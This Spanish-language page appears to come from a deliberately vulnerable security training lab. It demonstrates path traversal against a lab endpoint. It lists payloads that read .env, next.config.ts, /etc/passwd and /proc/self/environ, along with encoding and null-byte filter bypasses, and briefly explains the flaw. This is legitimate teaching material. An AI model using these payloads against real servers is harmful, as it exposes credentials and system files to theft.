Lectura de archivos arbitrarios del servidor usando secuencias ../ que escapan del directorio base permitido
Lectura normal de un archivo en el directorio de uploads
/api/lab/path-traversal?file=sample.txtSalir un nivel del directorio base y leer package.json (versiones, deps)
/api/lab/path-traversal?file=../../package.jsonLeer la configuración de Next.js con posibles secretos
/api/lab/path-traversal?file=../../../next.config.tsIntentar leer el archivo .env con secretos de la aplicación
/api/lab/path-traversal?file=../../../.envLeer directamente el archivo de contraseñas del sistema con ruta absoluta
/api/lab/path-traversal?file=/etc/passwdObtener el nombre del host del servidor
/api/lab/path-traversal?file=/etc/hostnameLeer variables de entorno del proceso actual (contiene secretos)
/api/lab/path-traversal?file=/proc/self/environCodificar ../ como %2e%2e%2f para evadir filtros simples de string
/api/lab/path-traversal?file=%2e%2e%2f%2e%2e%2fpackage.jsonDoble codificación URL para evadir filtros que decodifican una vez
/api/lab/path-traversal?file=%252e%252e%252fpackage.jsonEn sistemas heredados, el null byte trunca la ruta y elimina extensiones forzadas
/api/lab/path-traversal?file=../../../etc/passwd%00.txtEl parámetro ?file= se concatena directamente en la ruta del sistema de archivos sin normalizar ni validar. Usando secuencias ../ el atacante puede escapar del directorio base y acceder a cualquier archivo legible por el proceso del servidor: archivos de configuración (.env, next.config), código fuente, archivos del sistema (/etc/passwd, /proc/self/environ) y claves privadas. OWASP A01:2021 — CVSS 9.1.
Esta aplicación es vulnerable por diseño - Solo para propósitos educativos
© 2025 Aitana Security Lab